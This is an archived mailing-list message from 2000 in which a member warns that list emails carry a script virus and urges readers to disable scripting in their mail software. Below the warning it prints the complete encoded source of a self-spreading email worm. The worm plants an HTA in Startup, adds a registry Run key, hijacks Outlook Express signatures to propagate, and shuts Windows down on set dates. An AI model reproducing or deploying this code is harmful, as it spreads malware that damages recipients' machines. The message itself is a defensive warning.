Virus (was Re: [alberg30] A30 article-huge file)

George Dinwiddie gdinwiddie at min.net
Fri Apr 14 18:45:23 PDT 2000


Joe,

Your email contained the same virus that appeared in Towney's
email on the A30 list.  It shows up right above the ad banner
in the HTML source.  I'm beginning to think that perhaps it's
not your machine or Towney's machine that's infected, but
egroups' server.

Please, everyone, make sure that scripts are turned off in your
email software.  I can't think of any reason you'd want an
email to automatically run something on your machine.

 - George


--------------script source--------------
function sErr(){return
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z=
<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION
ID=3D\"hO=
\" WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object
id=3D'w=
sh'
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCR=
IPT>function sEr(){self.close();return
true;}window.onerror=3DsEr;fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=3Df=
s.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var
mye=3D=
new
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\\\=
StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists(kfr=
))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.FileExist=
s(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs.GetFile=
(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr)?wd+'MENU=
D=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('@echo
off>'+=
pth);t1.WriteLine('del
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFi=
le(kk,k2);fs.GetFile(k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg=
');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\I=
dentities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg=
=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default
Signature\"=
=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]')=
;t2.WriteLine('\"name\"=3D\"Signature
#1\"');t2.WriteLine('\"type\"=3Ddword=
:00000002');t2.WriteLine('\"text\"=3D\"\"');t2.Write('\"file\"=3D\"C:\\\\\\=
\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.=
Write('\"Signature
Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.Writ=
eLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe=
rsion\\\\Run]');t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\=
\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.ex=
e -s
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML=
><BODY><DIV style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OB=
JECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=3Dscr></"+"OBJ=
ECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read(1)!=3D'Z');t3.Writ=
eLine('<SCRIPT><!--');t3.write('function sErr(){return
true;}window.onerror=
=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095);t4.close();rd=3D/\\\=
\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\\\').replace(re,'\\\\=
\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=3D(navigator.systemLan=
guage)?navigator.systemLanguage:navigator.language;scr.Path=3D(la=3D=3D\"fr=
\")?\"C:\\\\\\\\windows\\\\\\\\Menu
D=E9marrer\\\\\\\\Programmes\\\\\\\\D=
=E9marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start
Menu\\\\\\\\Pr=
ograms\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.userAgent.toLowerCas=
e();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigator.appVersion)>4))|=
|(agt.indexOf(\"msie
5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCR=
IPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'k=
ak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew
Date();if(d.get=
Date()=3D=3D1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not
today =
!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRI=
PT>S3 driver memory alloc failed  
!]]%%%%%</"+"BODY></"+"HTML>";la=3D=
(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.=
Path=3D(la=3D=3D"fr")?"C:\\windows\\Menu
D=E9marrer\\Programmes\\D=E9marrag=
e\\kak.hta":"C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=3Dnav=
igator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=3D-1)&&(parseInt(n=
avigator.appVersion)>4))||(agt.indexOf("msie 5.")!=3D-1))scr.write();




